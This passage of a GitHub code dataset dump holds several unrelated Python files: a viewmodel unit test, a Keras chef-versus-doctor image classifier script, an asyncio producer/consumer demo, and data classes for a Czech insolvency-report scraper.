src.shared.infra.repositories.activity_repository_mock import ActivityRepositoryMock\nfrom src.shared.infra.repositories.user_repository_mock import UserRepositoryMock\n\n\nclass Test_DropActivityViewmodel:\n\n def test_drop_activity_viewmodel(self):\n repo = ActivityRepositoryMock()\n repo_user = UserRepositoryMock()\n\n enrollment = repo.enrollments[8]\n\n drop_activity_viewmodel = DropActivityViewmodel(enrollment, repo_user.users[3]).to_dict()\n\n expected = {'activity_code': \"COD1468\",\n 'user': {'name': 'Pedro Marcelino', 'user_id': '0355573c-a110-11ed-a8fc-0242ac120002', 'role': 'INTERNATIONAL_STUDENT'},\n 'state': 'DROPPED', 'date_subscribed': 1671488212000,\n 'message': 'the enrollment was dropped'}\n\n assert drop_activity_viewmodel == expected\n","repo_name":"Maua-Dev/smile_mss_activity","sub_path":"tests/modules/drop_activity/app/test_drop_activity_viewmodel.py","file_name":"test_drop_activity_viewmodel.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"37845292052","text":"from keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom imutils import contours\nfrom imutils import paths\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\nsize_width=64\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n\thelp=\"path to input directory of images\")\nap.add_argument(\"-m\", \"--model\", required=True,\n\thelp=\"path to input model\")\nargs = vars(ap.parse_args())\n\n# load the pre-trained network\nprint(\"[INFO] loading pre-trained network...\")\nmodel = load_model(args[\"model\"])\n\nimagePaths = list(paths.list_images(args[\"input\"]))\n\nfor imagePath in imagePaths:\n\t# load the image and convert it to grayscale, then pad the image\n\t# to ensure digits caught only the border of the image are\n\t# retained\n\timage = cv2.imread(imagePath)\n\timage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\timage = cv2.resize(image, (size_width, size_width))\n\timage = image.astype(\"float\") / 255.0\n\timage = img_to_array(image)\n\timage = np.expand_dims(image, axis=0)\n\t(pred1, pred2) = model.predict(image)[0]\n\tlabel = \"chef\" if pred1 > pred2 else \"doctor\"\n\tprint(imagePath+\":\"+label+\":\"+str(pred1)+\":\"+str(pred2))\n #print(str(pred1))\n\n\t# show the output image\n","repo_name":"vincentchung/lenetPredict","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"7538401582","text":"#!/usr/bin/env python\n\nimport asyncio\nfrom pprint import pprint\nimport time\nimport random\n\nfinal_result = []\n\nasync def producer(q):\n for i in range(100):\n q.put_nowait(i)\n\nasync def consumer(q_in,q_out,name):\n while True:\n item = await q_in.get()\n print(name,item)\n result = (item,item**2,name)\n q_in.task_done()\n q_out.put_nowait(result)\n await asyncio.sleep(random.randint(1,2) )\n\nasync def writer(q_out):\n while True:\n result = await q_out.get()\n final_result.append(result)\n print(\"writer\",result)\n q_out.task_done()\n\n\n\nasync def main():\n q_in = asyncio.Queue()\n q_out = asyncio.Queue()\n task_consumers = [asyncio.create_task(consumer(q_in,q_out,f\"consumer {i}\")) for i in range(10)]\n task_producer = asyncio.create_task(producer(q_in))\n task_writer = asyncio.create_task(writer(q_out))\n \n await asyncio.gather(task_producer)\n await q_in.join()\n\n for t in task_consumers:\n t.cancel()\n \n pprint(final_result)\n\nif __name__ == '__main__':\n asyncio.run(main())","repo_name":"fgaurat/pythonperf25042022","sub_path":"tp08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32005253535","text":"from .isir_dokument import IsirDokument\n\n\nclass PrubehRizeni:\n def __init__(self):\n self.Oddluzeni_povoleno = None\n self.Oddluzeni_schvaleno = None\n self.Zahajeno = None\n self.Zjisteni_upadku = None\n\n\nclass VysledekRizeni:\n def __init__(self):\n self.Posledni_splatka = None\n self.Zaslani_vyzvy_ukonceni_srazek = None\n self.Doporuceni_spravce = None\n self.Doporuceni_spravce_oduvodneni = None\n self.Zprava_o_prubehu = None\n self.Predpoklad_uspokojeni_nezaj_mira = None\n self.Predpoklad_uspokojeni_nezaj_vyse = None\n self.Uspokojeni_nezaj_mira = None\n self.Uspokojeni_nezaj_vyse = None\n self.Uspokojeni_zaj_mira = None\n self.Uspokojeni_zaj_vyse = None\n self.Preplatek = None\n\n\nclass OdmenaSpravce:\n def __init__(self):\n self.Celkova_odmena = None\n self.Celkova_odmena_uhrazeno = None\n self.Hotove_vydaje = None\n self.Hotove_vydaje_uhrazeno = None\n self.Vytezek_zpenezeni_rozdeleni = None\n self.Vytezek_zpenezeni_rozdeleni_uhrazeno = None\n self.Vytezek_zpenezeni_zaji = None\n self.Vytezek_zpenezeni_zaji_uhrazeno = None\n self.Zprava_spravce = None\n\n\nclass ZpravaSplneniOddluzeni(IsirDokument):\n\n TYP_DOKUMENTU = \"ZpravaSplneniOddluzeni\"\n\n def __init__(self):\n super().__init__()\n\n self.Prubeh_rizeni = PrubehRizeni()\n self.Vysledek_rizeni = VysledekRizeni()\n self.Odmena_spravce = OdmenaSpravce()\n","repo_name":"opendatalabcz/isir-explorer","sub_path":"pdf-scraper/isir_explorer/scraper/parser/model/zprava_splneni_oddluzeni.py","file_name":"zprava_splneni_oddluzeni.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"sk","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}